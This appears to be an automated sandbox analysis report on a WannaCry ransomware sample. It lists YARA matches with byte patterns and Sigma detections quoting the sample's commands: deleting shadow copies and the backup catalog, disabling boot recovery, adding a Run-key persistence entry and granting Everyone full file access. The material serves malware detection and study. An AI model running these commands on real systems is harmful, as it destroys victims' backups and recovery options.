C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\109861721946031.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
Click to see the 45 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.882205706.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000000.849626717.000000000040E000.00000008.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000022.00000000.1848649309.000000000041F000.00000008.00000001.01000000.0000000B.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0000001F.00000000.1847688235.000000000041F000.00000008.00000001.01000000.0000000B.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000003.872152587.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0000002E.00000000.2071838543.000000000041F000.00000008.00000001.01000000.0000000B.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0000002E.00000002.5896071201.000000000041F000.00000008.00000001.01000000.0000000B.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000022.00000002.1950334350.000000000041F000.00000008.00000001.01000000.0000000B.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000003.1844791357.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: LisectAVT_2403002A_126.EXE.exe PID: 9188	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: @WanaDecryptor@.exe PID: 5284	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: @WanaDecryptor@.exe PID: 5284	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
Process Memory Space: @WanaDecryptor@.exe PID: 4800	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
34.0.@WanaDecryptor@.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
34.0.@WanaDecryptor@.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
31.2.@WanaDecryptor@.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
31.2.@WanaDecryptor@.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
34.2.@WanaDecryptor@.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
34.2.@WanaDecryptor@.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
31.0.@WanaDecryptor@.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
31.0.@WanaDecryptor@.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
46.0.@WanaDecryptor@.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
46.0.@WanaDecryptor@.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
46.2.@WanaDecryptor@.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
46.2.@WanaDecryptor@.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0x342d41:$x2: taskdl.exe 0x35962d:$x2: taskdl.exe 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0x359d91:$s2: Windows 10 --> 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x3591ff:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
Click to see the 11 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Delete shadow copy via WMIC

Source: Process started

Author: Joe Security: Data: Command: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: @WanaDecryptor@.exe vs, ParentImage: C:\Users\user\Desktop\@WanaDecryptor@.exe, ParentProcessId: 4800, ParentProcessName: @WanaDecryptor@.exe, ProcessCommandLine: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, ProcessId: 8684, ProcessName: cmd.exe

System Summary

Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities

Source: Process started

Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: wmic shadowcopy delete, CommandLine: wmic shadowcopy delete, CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8684, ParentProcessName: cmd.exe, ProcessCommandLine: wmic shadowcopy delete, ProcessId: 8804, ProcessName: WMIC.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "njyalyugfohc920" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f, CommandLine: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "njyalyugfohc920" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe, ParentProcessId: 9188, ParentProcessName: LisectAVT_2403002A_126.EXE.exe, ProcessCommandLine: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "njyalyugfohc920" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f, ProcessId: 9200, ProcessName: cmd.exe

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe, ProcessId: 9188, TargetFilename: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\StartUp\~SD7344.tmp

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: cscript.exe //nologo m.vbs, CommandLine: cscript.exe //nologo m.vbs, CommandLine|base64offset|contains: (, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c 109861721946031.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8744, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe //nologo m.vbs, ProcessId: 8076, ProcessName: cscript.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

